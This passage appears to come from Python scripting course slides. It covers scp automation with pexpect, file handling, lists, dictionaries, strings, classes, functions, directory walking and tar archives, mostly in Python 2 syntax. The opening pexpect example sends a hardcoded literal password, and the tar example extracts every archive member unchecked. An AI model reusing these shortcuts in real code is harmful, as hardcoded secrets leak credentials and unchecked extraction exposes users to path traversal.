    cmd = 'scp %s %s@%s:%s' % (filename, user, host, directory)
    import pexpect
    child = pexpect.spawn(cmd)
    child.expect('password:')
    child.sendline('&%$hQxz?+MbH')
    child.expect(pexpect.EOF)  # important; wait for end of scp session
    child.close()
    

  • Complete example: simviz1.py version that runs oscillator on a remote machine (``supercomputer'') via pexpect:
    src/py/examples/simviz/simviz1_ssh_pexpect.py
    



    File reading

    Load a file into list of lines:
    infilename = '.myprog.cpp'
    infile = open(infilename, 'r')  # open file for reading 
    
    # load file into a list of lines:
    lines = infile.readlines()    
    
    # alternatively, load the whole file into one string (use instead of readlines):
    filestr = infile.read()
    
    Line-by-line reading (for large files):
    while 1:
        line = infile.readline()
        if not line: break
        # process line
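In newer Python versions a file object can be iterated over directly, which also reads one line at a time, and a with statement closes the file automatically. A sketch in Python 3 syntax with a hypothetical function count_nonblank_lines, tried out on a temporary file:

```python
import os, tempfile

def count_nonblank_lines(filename):
    """Read filename line by line and count lines with visible text."""
    n = 0
    with open(filename, 'r') as infile:   # closed when the block ends
        for line in infile:               # one line at a time
            if line.strip():
                n += 1
    return n

# demonstration on a small temporary file
fd, tmpname = tempfile.mkstemp()
os.close(fd)
with open(tmpname, 'w') as f:
    f.write('a\n\nb\n')
n = count_nonblank_lines(tmpname)
os.remove(tmpname)
```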
    



    File writing

    Open a new output file:
    outfilename = '.myprog2.cpp'
    outfile = open(outfilename, 'w')
    outfile.write('some string\n')
    
    Append to existing file:
    outfile = open(outfilename, 'a')
    outfile.write('....')
    



    Python types

  • Numbers: float, complex, int (+ bool)

  • Sequences: list, tuple, str, NumPy arrays

  • Mappings: dict (dictionary/hash)

  • Instances: user-defined class

  • Callables: functions, callable instances



    Numerical expressions

    Python distinguishes between strings and numbers:
    b =  1.2       # b is a number
    b = '1.2'      # b is a string
    a = 0.5 * b    # illegal: b is NOT converted to float
    a = 0.5 * float(b)   # this works
    
    All Python objects are compared with
    ==   !=  <  >  <=  >=
    



    Potential confusion

    Consider:
    b = '1.2'
    
    if b < 100:    print b, '< 100'
    else:          print b, '>= 100'
    
    What do we test? string less than number!
    What we want is
    if float(b) < 100:   # floating-point number comparison
    # or
    if b < str(100):     # string comparison
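Python 3 removes this source of confusion: comparing a string with a number raises a TypeError instead of giving a silent answer. The sketch below (Python 3 syntax) also shows why the string comparison is rarely what one wants for numbers, since strings are compared character by character:

```python
b = '1.2'

try:
    result = b < 100            # str vs int
except TypeError:
    result = 'TypeError'        # what Python 3 does

as_number = float(b) < 100      # 1.2 < 100
as_text = b < str(100)          # '1.2' < '100', since '.' sorts before '0'
misleading = '9' < str(100)     # '9' sorts after '1', so this is False
```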
    



    Boolean expressions

  • bool is True or False

  • Can mix bool with int 0 (false) or 1 (true)

  • Boolean tests:
    a = '';  a = [];  a = ();  a = {};  # empty structures
    a = 0;   a = 0.0
    if a:       # false
    if not a:   # true
    
    other values of a: if a is true
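The rule can be verified with bool, which returns the truth value of any object. A short sketch in Python 3 syntax; None, which is not listed on the slide, is also false:

```python
# empty structures, zero numbers and None all count as false
false_values = ['', [], (), {}, 0, 0.0, None]
as_bools = [bool(a) for a in false_values]

# non-empty structures are true, even if their content looks "false"
true_values = ['0', [0], (0,), {'a': 0}, -1, 0.1]
all_true = all(bool(a) for a in true_values)
```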



    Setting list elements

    Initializing a list:
    arglist = [myarg1, 'displacement', "tmp.ps"]
    
    Or with indices (if there are already two list elements):
    arglist[0] = myarg1
    arglist[1] = 'displacement'
    
    Create list of specified length:
    n = 100
    mylist = [0.0]*n
    
    Adding list elements:
    arglist = []  # start with empty list
    arglist.append(myarg1)
    arglist.append('displacement')
    



    Getting list elements

    Extract elements from a list:
     filename, plottitle, psfile  = arglist
    (filename, plottitle, psfile) = arglist
    [filename, plottitle, psfile] = arglist
    
    Or with indices:
    filename = arglist[0]
    plottitle = arglist[1]
    



    Traversing lists

    For each item in a list:
    for entry in arglist:
        print 'entry is', entry
    
    For-loop-like traversal:
    start = 0;  stop = len(arglist);  step = 1
    for index in range(start, stop, step):
        print 'arglist[%d]=%s' % (index,arglist[index])
    
    Visiting items in reverse order:
    mylist.reverse()  # reverse order
    for item in mylist:
        # do something...
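Note that mylist.reverse() changes the list itself. Two built-in functions give the same traversals without modifying the list or handling indices by hand: reversed and enumerate. A sketch in Python 3 syntax, with made-up list contents:

```python
arglist = ['sim.dat', 'displacement', 'tmp.ps']

# enumerate yields (index, item) pairs
indexed = ['arglist[%d]=%s' % (index, entry)
           for index, entry in enumerate(arglist)]

# reversed visits the items backwards; arglist itself is unchanged
backwards = [item for item in reversed(arglist)]
```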
    



    List comprehensions

  • Compact syntax for manipulating all elements of a list:
    y = [ float(yi) for yi in line.split() ]  # call function float
    x = [ a+i*h for i in range(n+1) ]         # execute expression
    
    (called list comprehension)

  • Written out:
    y = []
    for yi in line.split():
        y.append(float(yi))
    
    etc.



    Map function

  • map is an alternative to list comprehension:
    y = map(float, line.split())
    y = map(lambda i: a+i*h, range(n+1))
    

  • map can be faster than a list comprehension when it calls an existing function such as float, but it is not as easy to read
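In Python 3, map returns a lazy iterator rather than a list, so it must be wrapped in list to get the same result as the list comprehension. A sketch with made-up values for line, a, h and n:

```python
line = '0.0 0.1 1.0'
a = 0.0; h = 0.5; n = 2

y_map = list(map(float, line.split()))
y_comp = [float(yi) for yi in line.split()]

x_map = list(map(lambda i: a + i*h, range(n+1)))
x_comp = [a + i*h for i in range(n+1)]
```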



    Typical list operations

    d = []           # declare empty list
    
    d.append(1.2)    # add a number 1.2
    
    d.append('a')    # add a text
    
    d[0] = 1.3       # change an item
    
    del d[1]         # delete an item
    
    len(d)           # length of list
    



    Nested lists

    Lists can be nested and heterogeneous
    List of string, number, list and dictionary:
    >>> mylist = ['t2.ps', 1.45, ['t2.gif', 't2.png'],\
              { 'factor' : 1.0, 'c' : 0.9} ]
    >>> mylist[3]
    {'c': 0.90000000000000002, 'factor': 1.0}
    >>> mylist[3]['factor']
    1.0
    >>> print mylist
    ['t2.ps', 1.45, ['t2.gif', 't2.png'], 
     {'c': 0.90000000000000002, 'factor': 1.0}]
    
    Note: print prints all basic Python data structures in a nice format



    Sorting a list

    In-place sort:
    mylist.sort()
    
    modifies mylist!
    >>> print mylist
    [1.4, 8.2, 77, 10]
    >>> mylist.sort()
    >>> print mylist
    [1.4, 8.2, 10, 77]
    
    Strings and numbers are sorted as expected



    Defining the comparison criterion

    # ignore case when sorting:
    
    def ignorecase_sort(s1, s2): 
        s1 = s1.lower()
        s2 = s2.lower()
        if   s1 <  s2: return -1
        elif s1 == s2: return  0
        else:          return  1
    
    # or a quicker variant, using Python's built-in
    # cmp function:
    def ignorecase_sort(s1, s2): 
        s1 = s1.lower();  s2 = s2.lower()
        return cmp(s1,s2)
    
    # usage:
    mywords.sort(ignorecase_sort)
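In Python 3 the built-in cmp function is gone and sort no longer accepts a comparison function directly. The usual replacement is a key function; an existing comparison function can still be used through functools.cmp_to_key. A sketch with a made-up word list:

```python
from functools import cmp_to_key

def ignorecase_sort(s1, s2):
    s1 = s1.lower();  s2 = s2.lower()
    return (s1 > s2) - (s1 < s2)    # -1, 0 or 1, like the old cmp

mywords = ['banana', 'apple', 'Cherry']

by_key = sorted(mywords, key=str.lower)                   # preferred form
by_cmp = sorted(mywords, key=cmp_to_key(ignorecase_sort))
plain = sorted(mywords)             # uppercase letters sort first
```

sorted returns a new list; mywords.sort(key=str.lower) sorts in place with the same key.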
    



    Tuples ('constant lists')

    Tuple = constant list; items cannot be modified
    >>> s1=[1.2, 1.3, 1.4]   # list
    >>> s2=(1.2, 1.3, 1.4)   # tuple
    >>> s2=1.2, 1.3, 1.4     # may skip parenthesis
    >>> s1[1]=0              # ok
    >>> s2[1]=0              # illegal
    Traceback (innermost last):
      File "<pyshell#17>", line 1, in ?
        s2[1]=0
    TypeError: object doesn't support item assignment
    
    >>> s2.sort()
    AttributeError: 'tuple' object has no attribute 'sort'
    
    You cannot append to tuples, but you can add two tuples to form a new tuple



    Dictionary operations

    Dictionary = array with text indices (keys)
    (even user-defined objects can be indices!)
    Also called hash or associative array
    Common operations:
    d['mass']           # extract item corresp. to key 'mass'
    d.keys()            # return copy of list of keys
    d.get('mass',1.0)   # return 1.0 if 'mass' is not a key
    d.has_key('mass')   # does d have a key 'mass'?
    d.items()           # return list of (key,value) tuples
    del d['mass']       # delete an item
    len(d)              # the number of items
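Two of these operations differ in Python 3: has_key has been removed (use the in operator, which also works in Python 2), and keys() and items() return views rather than lists. A sketch with made-up dictionary contents:

```python
d = {'mass': 3.2, 'damping': 0.9}

has_mass = 'mass' in d               # replaces d.has_key('mass')
keys = sorted(d.keys())              # sorted turns the view into a list
stiffness = d.get('stiffness', 1.0)  # key is missing, default is returned
pairs = sorted(d.items())            # list of (key, value) tuples

del d['mass']
n_items = len(d)
```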
    



    Initializing dictionaries

    Multiple items:
    d = { 'key1' : value1, 'key2' : value2 }
    
    Item by item (indexing):
    d['key1'] = anothervalue1
    d['key2'] = anothervalue2
    d['key3'] = value2
    



    Dictionary examples

    Problem: store MPEG filenames corresponding to a parameter with values 1, 0.1, 0.001, 0.00001
    movies[1]       = 'heatsim1.mpeg'
    movies[0.1]     = 'heatsim2.mpeg'
    movies[0.001]   = 'heatsim5.mpeg'
    movies[0.00001] = 'heatsim8.mpeg'
    
    Store compiler data:
    g77 = {
      'name'          : 'g77',
      'description'   : 'GNU f77 compiler, v2.95.4',
      'compile_flags' : ' -pg',
      'link_flags'    : ' -pg',
      'libs'          : '-lf2c',
      'opt'           : '-O3 -ffast-math -funroll-loops'
    }
    



    Another dictionary example (1)

    Idea: hold command-line arguments in a dictionary cmlargs[option], e.g., cmlargs['infile'], instead of separate variables
    Initialization: loop through sys.argv, assume options in pairs: --option value
    arg_counter = 1
    while arg_counter < len(sys.argv):
        option = sys.argv[arg_counter]
        option = option[2:]  # remove double hyphen
        if option in cmlargs:
            # next command-line argument is the value:
            arg_counter += 1
            value = sys.argv[arg_counter]
            cmlargs[option] = value
        else:
            pass  # illegal option (ignored here)
        arg_counter += 1
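    
    The same idea can be wrapped in a function that works on any argument list, which makes it easy to try out without touching sys.argv. This is only a sketch: parse_pairs is a hypothetical helper name, and raising ValueError for illegal options or missing values is an assumption about the desired behavior.

```python
def parse_pairs(argv, defaults):
    """Return a copy of defaults updated with '--option value' pairs.

    argv is a list like sys.argv[1:]; parse_pairs is a hypothetical
    helper written for this illustration.
    """
    cmlargs = dict(defaults)
    i = 0
    while i < len(argv):
        option = argv[i][2:]            # remove double hyphen
        if option not in cmlargs:
            raise ValueError('illegal option: ' + argv[i])
        if i + 1 >= len(argv):
            raise ValueError('missing value for ' + argv[i])
        cmlargs[option] = argv[i + 1]   # next argument is the value
        i += 2
    return cmlargs

args = parse_pairs(['--m', '2.0', '--case', 'run1'],
                   {'m': '1.0', 'b': '0.7', 'case': 'tmp1'})
```

    Options not given on the command line keep their default values, and all values are still strings.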
    



    Another dictionary example (2)

    Working with cmlargs in simviz1.py:
    f = open(cmlargs['case'] + '.', 'w')
    f.write(cmlargs['m']     + '\n')
    f.write(cmlargs['b']     + '\n')
    f.write(cmlargs['c']     + '\n')
    f.write(cmlargs['func']  + '\n')
    ...
    # make gnuplot script:
    f = open(cmlargs['case'] + '.gnuplot', 'w')
    f.write("""
    set title '%s: m=%s b=%s c=%s f(y)=%s A=%s w=%s y0=%s dt=%s';
    """ % (cmlargs['case'],cmlargs['m'],cmlargs['b'],
           cmlargs['c'],cmlargs['func'],cmlargs['A'],
           cmlargs['w'],cmlargs['y0'],cmlargs['dt']))
    if not cmlargs['noscreenplot']:
        f.write("plot 'sim.dat' title 'y(t)' with lines;\n")
    
    Note: all cmlargs[opt] are (here) strings!



    Environment variables

    The dictionary-like os.environ holds the environment variables:
    os.environ['PATH']
    os.environ['HOME']
    os.environ['scripting']
    
    Write all the environment variables in alphabetic order:
    sorted_env = os.environ.keys()
    sorted_env.sort()
    
    for key in sorted_env:
        print '%s = %s' % (key, os.environ[key])
    



    Find a program

    Check if a given program is on the system:
    program = 'vtk'
    path = os.environ['PATH']  
    # PATH can be /usr/bin:/usr/local/bin:/usr/X11/bin
    # os.pathsep is the separator in PATH 
    # (: on Unix, ; on Windows) 
    paths = path.split(os.pathsep)
    for d in paths:
        if os.path.isdir(d):
            if os.path.isfile(os.path.join(d, program)):
                 program_path = d; break
    
    try:  # program was found if program_path is defined
        print '%s found in %s' % (program, program_path)
    except NameError:  # program_path was never assigned
        print '%s not found' % program
    



    Cross-platform fix of previous script

    On Windows, programs usually end with .exe (binaries) or .bat (DOS scripts), while on Unix most programs have no extension
    We test if we are on Windows:
    if sys.platform[:3] == 'win':
        # Windows-specific actions
    
    Cross-platform snippet for finding a program:
    for d in paths:
        if os.path.isdir(d):
            fullpath = os.path.join(d, program)
            if sys.platform[:3] == 'win':   # windows machine?
                for ext in '.exe', '.bat':  # add extensions
                    if os.path.isfile(fullpath + ext):
                        program_path = d; break
            else:
                if os.path.isfile(fullpath):
                    program_path = d; break
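    
    In the snippet above, a break inside the loop over extensions only leaves that inner loop, so the search continues with the remaining directories. Putting the search in a function and returning on the first hit avoids this. A minimal sketch, where find_program is a hypothetical helper name and the optional path argument is added to make the function easy to test:

```python
import os
import sys

def find_program(program, path=None):
    """Return the directory in path that holds program, or None.

    find_program is a hypothetical helper name; path defaults to the
    PATH environment variable.
    """
    if path is None:
        path = os.environ.get('PATH', '')
    if sys.platform[:3] == 'win':
        extensions = ['.exe', '.bat']   # Windows programs
    else:
        extensions = ['']               # Unix: no extension
    for d in path.split(os.pathsep):
        if not os.path.isdir(d):
            continue
        for ext in extensions:
            if os.path.isfile(os.path.join(d, program + ext)):
                return d                # leaves both loops at once
    return None
```

    Python 3.3 and later also offer shutil.which for this task.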
    



    Splitting text

    Split string into words:
    >>> files = 'case1.ps case2.ps    case3.ps'
    >>> files.split()
    ['case1.ps', 'case2.ps', 'case3.ps']
    
    Can split wrt other characters:
    >>> files = 'case1.ps, case2.ps, case3.ps'
    >>> files.split(', ')
    ['case1.ps', 'case2.ps', 'case3.ps']
    >>> files.split(',  ')  # extra erroneous space after comma...
    ['case1.ps, case2.ps, case3.ps']  # unsuccessful split
    
    Very useful when interpreting files



    Example on using split (1)

    Suppose you have a file containing numbers only
    The file can be formatted 'arbitrarily', e.g.,
    1.432 5E-09
    1.0
    
    3.2 5 69 -111
    4 7 8
    
    Get a list of all these numbers:
    f = open(filename, 'r')
    numbers = f.read().split()
    
    The split method of string objects splits with respect to sequences of whitespace (whitespace = blank character, tab or newline)



    Example on using split (2)

    Convert the list of strings to a list of floating-point numbers, using a list comprehension:
    numbers = [ float(x) for x in f.read().split() ]
    
    Think about reading this file in Fortran or C!
    (quite some low-level code...)
    This is a good example of how scripting languages, like Python, yield flexible and compact code
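    
    The complete read-and-convert step can be tried without a file on disk. In this sketch the sample file content is held in a string, and io.StringIO stands in for the open file (an assumption made to keep the example self-contained):

```python
import io

# the sample file content, held in memory
text = u"""1.432 5E-09
1.0

3.2 5 69 -111
4 7 8
"""
f = io.StringIO(text)     # behaves like an open text file
numbers = [float(x) for x in f.read().split()]
total = sum(numbers)
```

    Blank lines and varying numbers of values per line need no special treatment, since split works on any sequence of whitespace.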



    Joining a list of strings

    Join is the opposite of split:
    >>> line1 = 'iteration 12:    eps= 1.245E-05'
    >>> line1.split()
    ['iteration', '12:', 'eps=', '1.245E-05']
    >>> w = line1.split()
    >>> ' '.join(w)  # join w elements with delimiter ' '
    'iteration 12: eps= 1.245E-05'
    
    Any delimiter text can be used:
    >>> '@@@'.join(w)
    'iteration@@@12:@@@eps=@@@1.245E-05'
    



    Common use of join/split

    f = open('myfile', 'r')
    lines = f.readlines()            # list of lines
    filestr = ''.join(lines)         # a single string
    # can instead just do
    # filestr = f.read()
    
    # do something with filestr, e.g., substitutions...
    
    # convert back to list of lines:
    lines = filestr.splitlines() 
    for line in lines:
        # process line
    



    Text processing (1)

    Exact match and substring match:
    if line == 'double':
       # line equals 'double'
    
    if line.find('double') != -1:
       # line contains 'double'
    
    Matching with Unix shell-style wildcard notation:
    import fnmatch
    if fnmatch.fnmatch(line, 'double'):
       # the whole line matches the wildcard pattern 'double'
    
    Here, double can be any valid wildcard expression, e.g.,
    double*   [Dd]ouble
    



    Text processing (2)

    Matching with full regular expressions:
    import re
    if re.search(r'double', line): 
        # line contains 'double'
    
    Here, double can be any valid regular expression, e.g.,
    double[A-Za-z0-9_]*  [Dd]ouble  (DOUBLE|double)
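    
    The difference between the two kinds of matching is easy to overlook: fnmatch compares the pattern with the whole string, while re.search looks for the pattern anywhere in the string. A small sketch on a made-up line:

```python
import fnmatch
import re

line = 'double precision'   # made-up sample line

# fnmatch must match the whole string, so wildcards are needed
whole = fnmatch.fnmatch(line, 'double')       # no match: line is longer
prefix = fnmatch.fnmatch(line, 'double*')     # match: * covers the rest

# re.search looks for the pattern anywhere in the string
found = re.search(r'[Dd]ouble', line) is not None
word = re.search(r'double[A-Za-z0-9_]*', 'a doublet').group()
```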
    



    Substitution

    Simple substitution:
    newstring = oldstring.replace(substring, newsubstring)
    
    Substitute regular expression pattern by replacement in str:
    import re
    str = re.sub(pattern, replacement, str)
    



    Various string types

    There are many ways of constructing strings in Python:
    s1 = 'with forward quotes'
    s2 = "with double quotes"
    s3 = 'with single quotes and a variable: %(r1)g' \
         % vars()
    s4 = """as a triple double (or single) quoted string"""
    s5 = """triple double (or single) quoted strings
    allow multi-line text (i.e., newline is preserved)
    with other quotes like ' and  "
    """
    
    Raw strings are widely used for regular expressions
    s6 = r'raw strings start with r and \ remains backslash'
    s7 = r"""another raw string with a double backslash: \\ """
    



    String operations

    String concatenation:
    myfile = filename + '_tmp' + '.dat'
    
    Substring extraction:
    >>> teststr = '0123456789'
    >>> teststr[0:5]; teststr[:5]
    '01234'
    '01234'
    >>> teststr[3:8]
    '34567'
    >>> teststr[3:]
    '3456789'
    



    Mutable and immutable objects

    The items/contents of mutable objects can be changed in-place
    Lists and dictionaries are mutable
    The items/contents of immutable objects cannot be changed in-place
    Strings and tuples are immutable
    >>> s2=(1.2, 1.3, 1.4)   # tuple
    >>> s2[1]=0              # illegal
    



    Classes in Python

    Similar class concept as in Java and C++
    All functions are virtual
    No private/protected variables
    (the effect can be "simulated")
    Single and multiple inheritance
    Everything in Python is an object, i.e., an instance of some class
    Class programming is easier and faster than in C++ and Java (?)



    The basics of Python classes

    Declare a base class MyBase:
    class MyBase:
    
        def __init__(self,i,j):  # constructor
            self.i = i; self.j = j
    
        def write(self):         # member function
            print 'MyBase: i=',self.i,'j=',self.j
    
    self is a reference to this object
    Data members are prefixed by self:
    self.i, self.j
    All functions take self as first argument in the declaration, but not in the call
    obj1 = MyBase(6,9); obj1.write()
    



    Implementing a subclass

    Class MySub is a subclass of MyBase:
    class MySub(MyBase):
    
        def __init__(self,i,j,k):  # constructor
            MyBase.__init__(self,i,j)
            self.k = k
    
        def write(self):
            print 'MySub: i=',self.i,'j=',self.j,'k=',self.k
    
    Example:
    # this function works with any object that has a write func:
    def write(v): v.write()
    
    # make a MySub instance
    i = MySub(7,8,9)
    
    write(i)   # will call MySub's write
    



    Functions

    Python functions have the form
    def function_name(arg1, arg2, arg3):
        # statements
        return something
    
    Example:
    def debug(comment, variable):
        if os.environ.get('PYDEBUG', '0') == '1':
            print comment, variable
    ...
    v1 = file.readlines()[3:]
    debug('file %s (exclusive header):' % file.name, v1)
    
    v2 = somefunc()
    debug('result of calling somefunc:', v2)
    
    This function prints any printable object!



    Keyword arguments

    Can name arguments, i.e., keyword=default-value
    def mkdir(dirname, mode=0777, remove=1, chdir=1):
        if os.path.isdir(dirname):
            if remove:  shutil.rmtree(dirname)
            else:       return 0  # did not make a new directory
        os.mkdir(dirname, mode)
        if chdir: os.chdir(dirname)
        return 1      # made a new directory
    
    Calls look like
    mkdir('tmp1')
    mkdir('tmp1', remove=0, mode=0755)
    mkdir('tmp1', 0755, 0, 1)             # less readable
    
    Keyword arguments make the usage simpler and improve documentation



    Variable-size argument list

    Variable number of ordinary arguments:
    def somefunc(a, b, *rest):
        for arg in rest:
            # treat the rest...
    
    # call:
    somefunc(1.2, 9, 'one text', 'another text')
    #                ...........rest...........
    
    Variable number of keyword arguments:
    def somefunc(a, b, *rest, **kw):
        #...
        for arg in rest:
            # work with arg...
        for key in kw.keys():
            # work with kw[key]
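    
    A small runnable sketch shows how the arguments arrive inside such a function: rest is a tuple of the extra positional arguments and kw is a dictionary of the extra keyword arguments. The argument names tol and verbose in the call are invented for the illustration.

```python
def somefunc(a, b, *rest, **kw):
    """Return a description of how the arguments were received."""
    return {'a': a, 'b': b, 'rest': rest, 'kw': kw}

r = somefunc(1.2, 9, 'one text', 'another text', tol=1e-6, verbose=True)
```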
    



    Example

    A function computing the average and the max and min value of a series of numbers:
    def statistics(*args):
        avg = 0;  n = 0;   # local variables
        for number in args:  # sum up all the numbers
            n = n + 1; avg = avg + number
        avg = avg / float(n) # float() to ensure non-integer division
    
        min = args[0]; max = args[0]
        for term in args:
            if term < min: min = term
            if term > max: max = term
        return avg, min, max  # return tuple
    
    Usage:
    average, vmin, vmax = statistics(v1, v2, v3, b)
    



    The Python expert's version...

    The statistics function can be written more compactly using (advanced) Python functionality:
    import operator
    def statistics(*args):
        return (reduce(operator.add, args)/float(len(args)), 
                min(args), max(args))
    
    reduce(op,a): apply operation op successively on all elements in list a (here all elements are added)
    min(a), max(a): find min/max of a list a



    Call by reference

    Python scripts normally avoid call by reference and return all output variables instead
    Try to swap two numbers:
    >>> def swap(a, b):
            tmp = b; b = a; a = tmp;
        
    >>> a=1.2; b=1.3; swap(a, b)
    >>> print a, b    # have a and b been swapped?
    1.2 1.3           # no...
    
    The way to do this particular task
    >>> def swap(a, b):
        return (b,a)   # return tuple
    
    # or smarter, just say  (b,a) = (a,b)  or simply  b,a = a,b
    



    In-place list assignment

    Lists can be changed in-place in functions:
    >>> def somefunc(mutable, item, item_value):
    	mutable[item] = item_value
    	
    >>> a = ['a','b','c']  # a list
    >>> somefunc(a, 1, 'surprise')
    >>> print a
    ['a', 'surprise', 'c']
    
    This works for dictionaries and instances of user-defined classes as well
    (but not for tuples)



    Input and output data in functions

  • The Python programming style is to have input data as arguments and output data as return values
    def myfunc(i1, i2, i3, i4=False, io1=0):
        # io1: input and output variable
        ...
        # pack all output variables in a tuple:
        return io1, o1, o2, o3
    
    # usage:
    a, b, c, d = myfunc(e, f, g, h, a)
    

  • Only (a kind of) references to objects are transferred so returning a large data structure implies just returning a reference



    Scope of variables

    Variables defined inside the function are local
    To change global variables, these must be declared as global inside the function
    s = 1
    
    def myfunc(x, y):
        z = 0  # local variable, dies when we leave the func.
        global s
        s = 2  # assignment requires decl. as global
        return y-1,z+1
    
    Variables can be global, local (in func.), and class attributes
    The scope of variables in nested functions may confuse newcomers (see ch. 8.7 in the course book)



    File globbing

    List all .ps and .gif files (Unix):
    ls *.ps *.gif
    
    Cross-platform way to do it in Python:
    import glob
    filelist = glob.glob('*.ps') + glob.glob('*.gif')
    
    This is referred to as file globbing



    Testing file types

    import os.path, time
    print myfile,
    
    if os.path.isfile(myfile):
         print 'is a plain file'
    if os.path.isdir(myfile):
         print 'is a directory'
    if os.path.islink(myfile):
         print 'is a link'
    
    # the size and age:
    size = os.path.getsize(myfile)
    time_of_last_access       = os.path.getatime(myfile)
    time_of_last_modification = os.path.getmtime(myfile)
    
    # times are measured in seconds since 1970.01.01
    days_since_last_access = \
    (time.time() - os.path.getatime(myfile))/(3600*24)
    



    More detailed file info

    import os, stat
    
    myfile_stat = os.stat(myfile)
    filesize = myfile_stat[stat.ST_SIZE]
    mode = myfile_stat[stat.ST_MODE]
    if stat.S_ISREG(mode):
        print '%(myfile)s is a regular file '\
              'with %(filesize)d bytes' % vars()
    
    Check out the stat module in Python Library Reference



    Copy, rename and remove files

    Copy a file:
    import shutil
    shutil.copy(myfile, tmpfile)
    
    Rename a file:
    os.rename(myfile, 'tmp.1')
    
    Remove a file:
    os.remove('mydata')
    # or os.unlink('mydata')
    



    Path construction

    Cross-platform construction of file paths:
    filename = os.path.join(os.pardir, 'src', 'lib')
    
    # Unix:    ../src/lib
    # Windows: ..\src\lib
    
    shutil.copy(filename, os.curdir)
    
    # Unix:  cp ../src/lib .
    
    # os.pardir : ..
    # os.curdir : .
    



    Directory management

    Creating and moving to directories:
    dirname = 'mynewdir'
    if not os.path.isdir(dirname):
        os.mkdir(dirname) # or os.mkdir(dirname, 0755)
    os.chdir(dirname)
    
    Make complete directory path with intermediate directories:
    path = os.path.join(os.environ['HOME'],'py','src')
    os.makedirs(path)
    
    # Unix: mkdirhier $HOME/py/src
    
    Remove a non-empty directory tree:
    shutil.rmtree('myroot')
    



    Basename/directory of a path

    Given a path, e.g.,
    fname = '/home/hpl/scripting/python/intro/hw.py'
    
    Extract directory and basename:
    # basename: hw.py
    basename = os.path.basename(fname)
    
    # dirname: /home/hpl/scripting/python/intro
    dirname  = os.path.dirname(fname)
    
    # or
    dirname, basename = os.path.split(fname)
    
    Extract suffix:
    root, suffix = os.path.splitext(fname)
    # suffix: .py
    



    Platform-dependent operations

    The operating system interface in Python is the same on Unix, Windows and Mac
    Sometimes you need to perform platform-specific operations, but how can you make a portable script?
    # os.name       : operating system name
    # sys.platform  : platform identifier
    
    # cmd:  string holding command to be run
    if os.name == 'posix':            # Unix?
        failure, output = commands.getstatusoutput(cmd + '&')
    elif sys.platform[:3] == 'win':   # Windows?
        failure, output = commands.getstatusoutput('start ' + cmd)
    else:
        # foreground execution:
        failure, output = commands.getstatusoutput(cmd)
    



    Traversing directory trees (1)

    Run through all files in your home directory and list files that are larger than 1 Mb
    A Unix find command solves the problem:
    find $HOME -name '*' -type f -size +2000 \
         -exec ls -s {} \;
    
    This (and all features of Unix find) can be given a cross-platform implementation in Python



    Traversing directory trees (2)

    Similar cross-platform Python tool:
    root = os.environ['HOME']  # my home directory
    os.path.walk(root, myfunc, arg)
    
    walks through a directory tree (root) and calls, for each directory dirname,
    myfunc(arg, dirname, files)  # files is list of (local) filenames
    
    arg is any user-defined argument, e.g. a nested list of variables



    Example on finding large files

    def checksize1(arg, dirname, files):
        for file in files:
            # construct the file's complete path:
            filename = os.path.join(dirname, file)
            if os.path.isfile(filename):
                size = os.path.getsize(filename)
                if size > 1000000:
                    print '%.2fMb %s' % (size/1000000.0,filename)
                
    root = os.environ['HOME']
    os.path.walk(root, checksize1, None)
    
    # arg is a user-specified (optional) argument,
    # here we specify None since arg has no use
    # in the present example
    



    Make a list of all large files

  • Slight extension of the previous example

  • Now we use the arg variable to build a list during the walk
    def checksize1(arg, dirname, files):
        for file in files:
            filepath = os.path.join(dirname, file)
            if os.path.isfile(filepath):
                size = os.path.getsize(filepath)
                if size > 1000000:
                    size_in_Mb = size/1000000.0
                    arg.append((size_in_Mb, filepath))
                
    bigfiles = []
    root = os.environ['HOME']
    os.path.walk(root, checksize1, bigfiles)
    for size, name in bigfiles:
        print name, 'is', size, 'Mb'
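    
    os.path.walk is not available in Python 3. The generator os.walk (Python 2.3 and later) gives the same traversal without a callback function, so the list can simply be a local variable. A minimal sketch, where find_big_files and its limit argument are hypothetical names chosen for the illustration:

```python
import os

def find_big_files(root, limit=1000000):
    """Return a list of (size_in_Mb, path) for files larger than limit bytes."""
    bigfiles = []
    # os.walk yields one (directory, subdirectories, files) tuple per directory
    for dirname, subdirs, files in os.walk(root):
        for name in files:
            filepath = os.path.join(dirname, name)
            if os.path.isfile(filepath):
                size = os.path.getsize(filepath)
                if size > limit:
                    bigfiles.append((size/1000000.0, filepath))
    return bigfiles
```

    A call like find_big_files(os.environ['HOME']) then corresponds to the os.path.walk example above.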
    



    arg must be a list or dictionary

  • Let's build a tuple of all files instead of a list:
    def checksize1(arg, dirname, files):
        for file in files:
            filepath = os.path.join(dirname, file)
            if os.path.isfile(filepath):
                size = os.path.getsize(filepath)
                if size > 1000000:
                    msg = '%.2fMb %s' % (size/1000000.0, filepath)
                    arg = arg + (msg,)
    
    bigfiles = ()
    os.path.walk(os.environ['HOME'], checksize1, bigfiles)
    for msg in bigfiles:
        print msg
    

  • Now bigfiles is still an empty tuple! Why? Explain in detail... (Hint: arg must be mutable)
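
    The hint can be illustrated in isolation. In this sketch (rebind and change_in_place are hypothetical function names), assigning to arg inside a function only makes the local name refer to a new object, while an in-place change is visible to the caller:

```python
def rebind(arg, item):
    arg = arg + (item,)    # makes a new tuple; only the local name arg changes

def change_in_place(arg, item):
    arg.append(item)       # modifies the list object the caller also refers to

t = ()
rebind(t, 'file1')         # t is unchanged afterwards

lst = []
change_in_place(lst, 'file1')   # lst now holds 'file1'
```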



    Creating Tar archives

  • Tar is a widespread tool for packing file collections efficiently

  • Very useful for software distribution or sending (large) collections of files in email

  • Demo:
    >>> import tarfile, time
    >>> files = 'NumPy_basics.py', 'hw.py', 'leastsquares.py'
    >>> tar = tarfile.open('tmp.tar.gz', 'w:gz')  # gzip compression
    >>> for file in files:
    ...     tar.add(file)
    ...
    >>> # check what's in this archive:
    >>> members = tar.getmembers()  # list of TarInfo objects
    >>> for info in members:
    ...     print '%s: size=%d, mode=%s, mtime=%s' % \
    ...           (info.name, info.size, info.mode,
    ...            time.strftime('%Y.%m.%d', time.gmtime(info.mtime)))
    ...
    NumPy_basics.py: size=11898, mode=33261, mtime=2004.11.23
    hw.py: size=206, mode=33261, mtime=2005.08.12
    leastsquares.py: size=1560, mode=33261, mtime=2004.09.14
    >>> tar.close()
    

  • Compressions: uncompressed (w:), gzip (w:gz), bzip2 (w:bz2)



    Reading Tar archives

    >>> tar = tarfile.open('tmp.tar.gz', 'r')
    >>>
    >>> for file in tar.getmembers():
    ...     tar.extract(file)       # extract file to current work.dir.
    ...
    >>> # do we have all the files?
    >>> allfiles = os.listdir(os.curdir)
